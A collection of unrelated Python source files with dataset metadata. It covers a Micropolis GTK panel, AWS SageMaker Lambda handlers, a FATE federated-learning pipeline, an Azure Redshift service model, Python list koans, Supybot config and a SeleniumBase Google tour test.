from . import micropolisdrawingarea
########################################################################
# MicropolisNoticePanel
class MicropolisNoticePanel(gtk.Frame):
def __init__(
self,
engine=None,
centerOnTileHandler=None,
**args):
gtk.Frame.__init__(
self,
**args)
self.engine = engine
self.mapViewVisible = False
engine.expressInterest(
self,
('gameMode',))
# Views
hpaned1 = gtk.HPaned()
self.hpaned1 = hpaned1
self.add(hpaned1)
self.noticeView = micropolisnoticeview.MicropolisNoticeView(
engine=engine,
setMapViewVisible=self.setMapViewVisible)
hpaned1.pack1(self.noticeView, resize=False, shrink=False)
mapView = micropolisdrawingarea.NoticeMicropolisDrawingArea(
engine=engine,
centerOnTileHandler=centerOnTileHandler)
self.mapView = mapView
mapView.set_size_request(150, -1)
mapView.visible = False
hpaned1.pack2(mapView, resize=False, shrink=False)
hpaned1.set_position(1000)
def update(self, name, *args):
engine = self.engine
if name == 'gameMode':
self.updateMapViewAdded()
def updateMapViewAdded(self):
engine = self.engine
mapView = self.mapView
if ((engine.gameMode == 'play') and
self.mapViewVisible):
mapView.set_property("visible", True)
mapView.engage()
else:
mapView.set_property("visible", False)
mapView.disengage()
def setMapViewVisible(self, visible, tileX=-1, tileY=-1, sprite=micropolisengine.SPRITE_NOTUSED):
#print "setMapViewVisible", visible, tileX, tileY, self.mapViewVisible
engine = self.engine
mapView = self.mapView
if visible and (tileX >= 0) and (tileY >= 0):
mapView.centerOnTile(tileX, tileY)
mapView.sprite = sprite
self.mapViewVisible = visible
self.updateMapViewAdded()
########################################################################
| micropolis/MicropolisCore/src/pyMicropolis/micropolisEngine/micropolisnoticepanel.py | 5,886 | micropolisnoticepanel.py Micropolis, Unix Version. This game was released for the Unix platform in or about 1990 and has been modified for inclusion in the One Laptop Per Child program. Copyright (C) 1989 - 2007 Electronic Arts Inc. If you need assistance with this program, you may contact: http://wiki.laptop.org/go/Micropolis or email micropolis@laptop.org. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. ADDITIONAL TERMS per GNU GPL Section 7 No trademark or publicity rights are granted. This license does NOT give you any right, title or interest in the trademark SimCity or any other Electronic Arts trademark. You may not distribute any modification of this program using the trademark SimCity or claim any affliation or association with Electronic Arts Inc. or its employees. Any propagation or conveyance of this program must include this copyright notice and these terms. If you convey this program (or any modifications of it) and assume contractual liability for the program to recipients of it, you agree to indemnify Electronic Arts for any liability that those contractual assumptions impose on Electronic Arts. You may not misrepresent the origins of this program; modified versions of the program must be marked as such and not identified as the original program. This disclaimer supplements the one included in the General Public License. TO THE FULLEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW, THIS PROGRAM IS PROVIDED TO YOU "AS IS," WITH ALL FAULTS, WITHOUT WARRANTY OF ANY KIND, AND YOUR USE IS AT YOUR SOLE RISK. THE ENTIRE RISK OF SATISFACTORY QUALITY AND PERFORMANCE RESIDES WITH YOU. ELECTRONIC ARTS DISCLAIMS ANY AND ALL EXPRESS, IMPLIED OR STATUTORY WARRANTIES, INCLUDING IMPLIED WARRANTIES OF MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT OF THIRD PARTY RIGHTS, AND WARRANTIES (IF ANY) ARISING FROM A COURSE OF DEALING, USAGE, OR TRADE PRACTICE. ELECTRONIC ARTS DOES NOT WARRANT AGAINST INTERFERENCE WITH YOUR ENJOYMENT OF THE PROGRAM; THAT THE PROGRAM WILL MEET YOUR REQUIREMENTS; THAT OPERATION OF THE PROGRAM WILL BE UNINTERRUPTED OR ERROR-FREE, OR THAT THE PROGRAM WILL BE COMPATIBLE WITH THIRD PARTY SOFTWARE OR THAT ANY ERRORS IN THE PROGRAM WILL BE CORRECTED. NO ORAL OR WRITTEN ADVICE PROVIDED BY ELECTRONIC ARTS OR ANY AUTHORIZED REPRESENTATIVE SHALL CREATE A WARRANTY. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF OR LIMITATIONS ON IMPLIED WARRANTIES OR THE LIMITATIONS ON THE APPLICABLE STATUTORY RIGHTS OF A CONSUMER, SO SOME OR ALL OF THE ABOVE EXCLUSIONS AND LIMITATIONS MAY NOT APPLY TO YOU. Micropolis Status View Don Hopkins Import stuff MicropolisNoticePanel Viewsprint "setMapViewVisible", visible, tileX, tileY, self.mapViewVisible | 3,319 | en | 0.894164 |
import json
import datetime
import time
import boto3
import os
def train_and_generate_recommendations(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
for row in rows:
# Read the input row number (the output row number will be the same).
row_number = row[0]
# Read the first input parameter's value. For example, this can be a
# numeric value or a string, or it can be a compound value such as
# a JSON structure.
_input_table_name = row[1]
_output_table_name = row[2]
# start the SageMaker training job
client = boto3.client('sagemaker')
bucket = os.environ['s3_bucket']
prefix = "training-job-" + time.strftime("%Y%m%d%H%M%S")
s3_output_location = 's3://{}/'.format(bucket)
print(s3_output_location)
training_job_name = prefix
TRAINING_IMAGE_ECR_PATH = os.environ['training_image_ecr_path']
SAGEMAKER_ROLE_ARN = os.environ['sagemaker_role_arn']
response = client.create_training_job(
TrainingJobName=training_job_name,
HyperParameters=dict(input_table_name=_input_table_name, output_table_name=_output_table_name, region=os.environ['region']),
AlgorithmSpecification={
'TrainingImage': TRAINING_IMAGE_ECR_PATH,
'TrainingInputMode': 'File'
},
RoleArn=SAGEMAKER_ROLE_ARN,
OutputDataConfig={
'S3OutputPath': s3_output_location
},
ResourceConfig={
'InstanceType': 'ml.m5.xlarge',
'InstanceCount': 1,
'VolumeSizeInGB': 10
},
StoppingCondition={
'MaxRuntimeInSeconds': 10000
}
)
training_job_arn = response['TrainingJobArn']
print(training_job_arn)
array_of_rows_to_return = []
# Put the returned row number and the returned value into an array.
row_to_return = [0, training_job_arn]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
}
def deploy_model(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
for row in rows:
# Read the input row number (the output row number will be the same).
row_number = row[0]
# Read the first input parameter's value.
model_name = row[1]
model_data_url = row[2]
# start the SageMaker training job
client = boto3.client('sagemaker')
ECR_PATH = os.environ['training_image_ecr_path']
SAGEMAKER_ROLE_ARN = os.environ['sagemaker_role_arn']
response = client.create_model(
ModelName=model_name,
PrimaryContainer={
'Image': ECR_PATH,
'ModelDataUrl': model_data_url
},
ExecutionRoleArn=SAGEMAKER_ROLE_ARN
)
print(response)
print("now trying to create endpoint config...")
response = client.create_endpoint_config(
EndpointConfigName=model_name,
ProductionVariants=[
{
'VariantName': 'variant-1',
'ModelName': model_name,
'InitialInstanceCount': 1,
'InstanceType': 'ml.t2.medium'
}
]
)
print(response)
print("now trying to create the endpoint...")
response = client.create_endpoint(
EndpointName=model_name,
EndpointConfigName=model_name
)
endpoint_arn = response['EndpointArn']
print(endpoint_arn)
array_of_rows_to_return = []
# Put the returned row number and the returned value into an array.
row_to_return = [0, endpoint_arn]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
}
# function that performs real-time prediction
def invoke_model(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
body = ""
for row in rows:
model_name = row[1]
# extract and transform the user_ids and item_ids posted to csv
body = body + row[2] + "," + row[3] + "\n"
# invoke the SageMaker endpoint
client = boto3.client('sagemaker-runtime')
response = client.invoke_endpoint(
EndpointName=model_name,
Body=body.encode('utf-8'),
ContentType='text/csv'
)
predictions = response["Body"].read().decode('utf-8')
i = 0
array_of_rows_to_return = []
for prediction in iter(predictions.splitlines()):
# Put the returned row number and the returned value into an array.
row_to_return = [i, prediction]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
i = i + 1
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
} | sls/handler.py | 8,037 | 200 is the HTTP status code for "ok". From the input parameter named "event", get the body, which contains the input rows. Convert the input from a JSON string into a JSON object. This is basically an array of arrays. The inner array contains the row number, and a value for each parameter passed to the function. For each input row in the JSON object... Read the input row number (the output row number will be the same). Read the first input parameter's value. For example, this can be a numeric value or a string, or it can be a compound value such as a JSON structure. start the SageMaker training job Put the returned row number and the returned value into an array. ... and add that array to the main array. 400 implies some type of error. Tell caller what this function could not handle. Return the return value and HTTP status code. 200 is the HTTP status code for "ok". From the input parameter named "event", get the body, which contains the input rows. Convert the input from a JSON string into a JSON object. This is basically an array of arrays. The inner array contains the row number, and a value for each parameter passed to the function. For each input row in the JSON object... Read the input row number (the output row number will be the same). Read the first input parameter's value. start the SageMaker training job Put the returned row number and the returned value into an array. ... and add that array to the main array. 400 implies some type of error. Tell caller what this function could not handle. Return the return value and HTTP status code. function that performs real-time prediction 200 is the HTTP status code for "ok". From the input parameter named "event", get the body, which contains the input rows. Convert the input from a JSON string into a JSON object. This is basically an array of arrays. The inner array contains the row number, and a value for each parameter passed to the function. For each input row in the JSON object... extract and transform the user_ids and item_ids posted to csv invoke the SageMaker endpoint Put the returned row number and the returned value into an array. ... and add that array to the main array. 400 implies some type of error. Tell caller what this function could not handle. Return the return value and HTTP status code. | 2,298 | en | 0.74251 |
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import json
from pipeline.backend.pipeline import PipeLine
from pipeline.component.dataio import DataIO
from pipeline.component.homo_lr import HomoLR
from pipeline.component.reader import Reader
from pipeline.component.scale import FeatureScale
from pipeline.interface.data import Data
from pipeline.utils.tools import load_job_config
from pipeline.runtime.entity import JobParameters
def main(config="../../config.yaml", namespace=""):
# obtain config
if isinstance(config, str):
config = load_job_config(config)
parties = config.parties
guest = parties.guest[0]
host = parties.host[0]
arbiter = parties.arbiter[0]
backend = config.backend
work_mode = config.work_mode
guest_train_data = {"name": "breast_homo_guest", "namespace": f"experiment{namespace}"}
host_train_data = {"name": "breast_homo_host", "namespace": f"experiment{namespace}"}
# initialize pipeline
pipeline = PipeLine()
# set job initiator
pipeline.set_initiator(role='guest', party_id=guest)
# set participants information
pipeline.set_roles(guest=guest, host=host, arbiter=arbiter)
# define Reader components to read in data
reader_0 = Reader(name="reader_0")
# configure Reader for guest
reader_0.get_party_instance(role='guest', party_id=guest).component_param(table=guest_train_data)
# configure Reader for host
reader_0.get_party_instance(role='host', party_id=host).component_param(table=host_train_data)
# define DataIO components
dataio_0 = DataIO(name="dataio_0", with_label=True, output_format="dense") # start component numbering at 0
scale_0 = FeatureScale(name='scale_0')
param = {
"penalty": "L2",
"optimizer": "sgd",
"tol": 1e-05,
"alpha": 0.01,
"max_iter": 3,
"early_stop": "diff",
"batch_size": 320,
"learning_rate": 0.15,
"decay": 1.0,
"decay_sqrt": True,
"init_param": {
"init_method": "zeros"
},
"encrypt_param": {
"method": None
},
"cv_param": {
"n_splits": 5,
"shuffle": True,
"random_seed": 33,
"need_cv": True
}
}
homo_lr_0 = HomoLR(name='homo_lr_0', **param)
# add components to pipeline, in order of task execution
pipeline.add_component(reader_0)
pipeline.add_component(dataio_0, data=Data(data=reader_0.output.data))
# set data input sources of intersection components
pipeline.add_component(scale_0, data=Data(data=dataio_0.output.data))
pipeline.add_component(homo_lr_0, data=Data(train_data=scale_0.output.data))
# compile pipeline once finished adding modules, this step will form conf and dsl files for running job
pipeline.compile()
# fit model
job_parameters = JobParameters(backend=backend, work_mode=work_mode)
pipeline.fit(job_parameters)
# query component summary
print(json.dumps(pipeline.get_component("homo_lr_0").get_summary(), indent=4, ensure_ascii=False))
if __name__ == "__main__":
parser = argparse.ArgumentParser("PIPELINE DEMO")
parser.add_argument("-config", type=str,
help="config file")
args = parser.parse_args()
if args.config is not None:
main(args.config)
else:
main()
| examples/pipeline/homo_logistic_regression/pipeline-homo-lr-cv.py | 3,975 | Copyright 2019 The FATE Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. obtain config initialize pipeline set job initiator set participants information define Reader components to read in data configure Reader for guest configure Reader for host define DataIO components start component numbering at 0 add components to pipeline, in order of task execution set data input sources of intersection components compile pipeline once finished adding modules, this step will form conf and dsl files for running job fit model query component summary | 1,056 | en | 0.825279 |
# AutoTransform
# Large scale, component based code modification library
#
# Licensed under the MIT License <http://opensource.org/licenses/MIT>
# SPDX-License-Identifier: MIT
# Copyright (c) 2022-present Nathan Rockenbach <http://github.com/nathro>
# @black_format
"""A change represents a submission from a run of AutoTransform on a particular Batch. They
are used for managing submissions to code review/source control systems. A pull request is
an example of a potential change."""
| src/python/autotransform/change/__init__.py | 488 | A change represents a submission from a run of AutoTransform on a particular Batch. They
are used for managing submissions to code review/source control systems. A pull request is
an example of a potential change.
AutoTransform Large scale, component based code modification library Licensed under the MIT License <http://opensource.org/licenses/MIT> SPDX-License-Identifier: MIT Copyright (c) 2022-present Nathan Rockenbach <http://github.com/nathro> @black_format | 467 | en | 0.688555 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .linked_service_py3 import LinkedService
class AmazonRedshiftLinkedService(LinkedService):
"""Linked service for Amazon Redshift.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:param connect_via: The integration runtime reference.
:type connect_via:
~azure.mgmt.datafactory.models.IntegrationRuntimeReference
:param description: Linked service description.
:type description: str
:param parameters: Parameters for linked service.
:type parameters: dict[str,
~azure.mgmt.datafactory.models.ParameterSpecification]
:param annotations: List of tags that can be used for describing the
Dataset.
:type annotations: list[object]
:param type: Required. Constant filled by server.
:type type: str
:param server: Required. The name of the Amazon Redshift server. Type:
string (or Expression with resultType string).
:type server: object
:param username: The username of the Amazon Redshift source. Type: string
(or Expression with resultType string).
:type username: object
:param password: The password of the Amazon Redshift source.
:type password: ~azure.mgmt.datafactory.models.SecretBase
:param database: Required. The database name of the Amazon Redshift
source. Type: string (or Expression with resultType string).
:type database: object
:param port: The TCP port number that the Amazon Redshift server uses to
listen for client connections. The default value is 5439. Type: integer
(or Expression with resultType integer).
:type port: object
:param encrypted_credential: The encrypted credential used for
authentication. Credentials are encrypted using the integration runtime
credential manager. Type: string (or Expression with resultType string).
:type encrypted_credential: object
"""
_validation = {
'type': {'required': True},
'server': {'required': True},
'database': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'connect_via': {'key': 'connectVia', 'type': 'IntegrationRuntimeReference'},
'description': {'key': 'description', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{ParameterSpecification}'},
'annotations': {'key': 'annotations', 'type': '[object]'},
'type': {'key': 'type', 'type': 'str'},
'server': {'key': 'typeProperties.server', 'type': 'object'},
'username': {'key': 'typeProperties.username', 'type': 'object'},
'password': {'key': 'typeProperties.password', 'type': 'SecretBase'},
'database': {'key': 'typeProperties.database', 'type': 'object'},
'port': {'key': 'typeProperties.port', 'type': 'object'},
'encrypted_credential': {'key': 'typeProperties.encryptedCredential', 'type': 'object'},
}
def __init__(self, *, server, database, additional_properties=None, connect_via=None, description: str=None, parameters=None, annotations=None, username=None, password=None, port=None, encrypted_credential=None, **kwargs) -> None:
super(AmazonRedshiftLinkedService, self).__init__(additional_properties=additional_properties, connect_via=connect_via, description=description, parameters=parameters, annotations=annotations, **kwargs)
self.server = server
self.username = username
self.password = password
self.database = database
self.port = port
self.encrypted_credential = encrypted_credential
self.type = 'AmazonRedshift'
| sdk/datafactory/azure-mgmt-datafactory/azure/mgmt/datafactory/models/amazon_redshift_linked_service_py3.py | 4,238 | Linked service for Amazon Redshift.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:param connect_via: The integration runtime reference.
:type connect_via:
~azure.mgmt.datafactory.models.IntegrationRuntimeReference
:param description: Linked service description.
:type description: str
:param parameters: Parameters for linked service.
:type parameters: dict[str,
~azure.mgmt.datafactory.models.ParameterSpecification]
:param annotations: List of tags that can be used for describing the
Dataset.
:type annotations: list[object]
:param type: Required. Constant filled by server.
:type type: str
:param server: Required. The name of the Amazon Redshift server. Type:
string (or Expression with resultType string).
:type server: object
:param username: The username of the Amazon Redshift source. Type: string
(or Expression with resultType string).
:type username: object
:param password: The password of the Amazon Redshift source.
:type password: ~azure.mgmt.datafactory.models.SecretBase
:param database: Required. The database name of the Amazon Redshift
source. Type: string (or Expression with resultType string).
:type database: object
:param port: The TCP port number that the Amazon Redshift server uses to
listen for client connections. The default value is 5439. Type: integer
(or Expression with resultType integer).
:type port: object
:param encrypted_credential: The encrypted credential used for
authentication. Credentials are encrypted using the integration runtime
credential manager. Type: string (or Expression with resultType string).
:type encrypted_credential: object
coding=utf-8 -------------------------------------------------------------------------- Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the MIT License. See License.txt in the project root for license information. Code generated by Microsoft (R) AutoRest Code Generator. Changes may cause incorrect behavior and will be lost if the code is regenerated. -------------------------------------------------------------------------- | 2,228 | en | 0.610655 |
import os,sys
import numpy as np
import h5py, time, argparse, itertools, datetime
from scipy import ndimage
import torchvision.utils as vutils
# tensorboardX
from tensorboardX import SummaryWriter
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def get_logger(args):
log_name = args.output+'/log'
date = str(datetime.datetime.now()).split(' ')[0]
time = str(datetime.datetime.now()).split(' ')[1].split('.')[0]
log_name += date+'_'+time
logger = open(log_name+'.txt','w') # unbuffered, write instantly
# tensorboardX
writer = SummaryWriter('runs/'+log_name)
return logger, writer
| torch_connectomics/io/misc.py | 961 | Computes and stores the average and current value
tensorboardX unbuffered, write instantly tensorboardX | 105 | en | 0.913621 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Based on AboutArrays in the Ruby Koans
#
from runner.koan import *
class AboutLists(Koan):
def test_creating_lists(self):
empty_list = list()
self.assertEqual(list, type(empty_list))
self.assertEqual(0, len(empty_list))
def test_list_literals(self):
nums = list()
self.assertEqual([], nums)
nums[0:] = [1]
self.assertEqual([1], nums)
nums[1:] = [2]
self.assertListEqual([1, 2], nums)
nums.append(333)
self.assertListEqual([1, 2, 333], nums)
def test_accessing_list_elements(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual('peanut', noms[0])
self.assertEqual('jelly', noms[3])
self.assertEqual('jelly', noms[-1])
self.assertEqual('butter', noms[-3])
def test_slicing_lists(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(['peanut'], noms[0:1])
self.assertEqual(['peanut','butter'], noms[0:2])
self.assertEqual([], noms[2:2])
self.assertEqual(['and','jelly'], noms[2:20])
self.assertEqual([], noms[4:0])
self.assertEqual([], noms[4:100])
self.assertEqual([], noms[5:0])
def test_slicing_to_the_edge(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(['and','jelly'], noms[2:])
self.assertEqual(['peanut','butter'], noms[:2])
def test_lists_and_ranges(self):
self.assertEqual(range, type(range(5)))
self.assertNotEqual([1, 2, 3, 4, 5], range(1,6))
self.assertEqual ([0,1,2,3,4], list(range(5)))
self.assertEqual([5,6,7,8], list(range(5, 9)))
def test_ranges_with_steps(self):
self.assertEqual([5,4], list(range(5, 3, -1)))
self.assertEqual([0,2,4,6], list(range(0, 8, 2)))
self.assertEqual([1,4,7], list(range(1, 8, 3)))
self.assertEqual([5,1,-3], list(range(5, -7, -4)))
self.assertEqual([5,1,-3,-7], list(range(5, -8, -4)))
def test_insertions(self):
knight = ['you', 'shall', 'pass']
knight.insert(2, 'not')
self.assertEqual(['you', 'shall', 'not', 'pass'], knight)
knight.insert(0, 'Arthur')
self.assertEqual(['Arthur','you', 'shall', 'not', 'pass' ], knight)
def test_popping_lists(self):
stack = [10, 20, 30, 40]
stack.append('last')
self.assertEqual([10, 20, 30, 40, 'last'], stack)
popped_value = stack.pop()
self.assertEqual('last', popped_value)
self.assertEqual([10, 20, 30, 40], stack)
popped_value = stack.pop(1)
self.assertEqual(20, popped_value)
self.assertEqual([10, 30, 40], stack)
# Notice that there is a "pop" but no "push" in python?
# Part of the Python philosophy is that there ideally should be one and
# only one way of doing anything. A 'push' is the same as an 'append'.
# To learn more about this try typing "import this" from the python
# console... ;)
def test_making_queues(self):
queue = [1, 2]
queue.append('last')
self.assertEqual([1,2,'last'], queue)
popped_value = queue.pop(0)
self.assertEqual(1, popped_value)
self.assertEqual([2,'last'], queue)
# Note, popping from the left hand side of a list is
# inefficient. Use collections.deque instead.
| python3/koans/about_lists.py | 3,461 | !/usr/bin/env python -*- coding: utf-8 -*- Based on AboutArrays in the Ruby Koans Notice that there is a "pop" but no "push" in python? Part of the Python philosophy is that there ideally should be one and only one way of doing anything. A 'push' is the same as an 'append'. To learn more about this try typing "import this" from the python console... ;) Note, popping from the left hand side of a list is inefficient. Use collections.deque instead. | 449 | en | 0.906676 |
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# Copyright (c) 2009, James McCoy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('Factoids', True)
class FactoidFormat(registry.TemplatedString):
"""Value must include $value, otherwise the factoid's value would be left
out."""
requiredTemplates = ['value']
Factoids = conf.registerPlugin('Factoids')
conf.registerChannelValue(Factoids, 'learnSeparator',
registry.String('as', """Determines what separator must be used in the
learn command. Defaults to 'as' -- learn <key> as <value>. Users might
feel more comfortable with 'is' or something else, so it's
configurable."""))
conf.registerChannelValue(Factoids, 'showFactoidIfOnlyOneMatch',
registry.Boolean(True, """Determines whether the bot will reply with the
single matching factoid if only one factoid matches when using the search
command."""))
conf.registerChannelValue(Factoids, 'replyWhenInvalidCommand',
registry.Boolean(True, """Determines whether the bot will reply to invalid
commands by searching for a factoid; basically making the whatis
unnecessary when you want all factoids for a given key."""))
conf.registerChannelValue(Factoids, 'format',
FactoidFormat('$key could be $value.', """Determines the format of
the response given when a factoid's value is requested. All the standard
substitutes apply, in addition to "$key" for the factoid's key and "$value"
for the factoid's value."""))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| plugins/Factoids/config.py | 3,478 | Value must include $value, otherwise the factoid's value would be left
out.
Copyright (c) 2002-2005, Jeremiah Fincher Copyright (c) 2009, James McCoy All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions, and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions, and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the author of this software nor the name of contributors to this software may be used to endorse or promote products derived from this software without specific prior written consent. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. This will be called by supybot to configure this module. advanced is a bool that specifies whether the user identified himself as an advanced user or not. You should effect your configuration by manipulating the registry as appropriate. vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: | 1,935 | en | 0.891316 |
from seleniumbase import BaseCase
class MyTourClass(BaseCase):
def test_google_tour(self):
self.open('https://google.com/ncr')
self.wait_for_element('input[title="Search"]')
# Create a website tour using the ShepherdJS library with "dark" theme
# Same as: self.create_shepherd_tour(theme="dark")
self.create_tour(theme="dark")
self.add_tour_step("Welcome to Google!", title="SeleniumBase Tours")
self.add_tour_step("Type in your query here.", 'input[title="Search"]')
self.play_tour()
self.highlight_update_text('input[title="Search"]', "Google")
self.wait_for_element('[role="listbox"]') # Wait for autocomplete
# Create a website tour using the ShepherdJS library with "light" theme
# Same as: self.create_shepherd_tour(theme="light")
self.create_tour(theme="light")
self.add_tour_step("Then click to search.", '[value="Google Search"]')
self.add_tour_step("Or press [ENTER] after entry.", '[title="Search"]')
self.play_tour()
self.highlight_update_text('input[title="Search"]', "GitHub\n")
self.wait_for_element("#search")
# Create a website tour using the Bootstrap Tour JS library
# Same as: self.create_bootstrap_tour()
self.create_tour(theme="bootstrap")
self.add_tour_step("See Results Here!", title="(5-second autoplay)")
self.add_tour_step("Here's the next tour:")
self.play_tour(interval=5) # Tour automatically continues after 5 sec
self.open("https://www.google.com/maps/@42.3598616,-71.0912631,15z")
self.wait_for_element("#searchboxinput")
self.wait_for_element("#minimap")
self.wait_for_element("#zoom")
# Create a website tour using the IntroJS library
# Same as: self.create_introjs_tour()
self.create_tour(theme="introjs")
self.add_tour_step("Welcome to Google Maps!")
self.add_tour_step("Type in a location here.",
"#searchboxinput", title="Search Box")
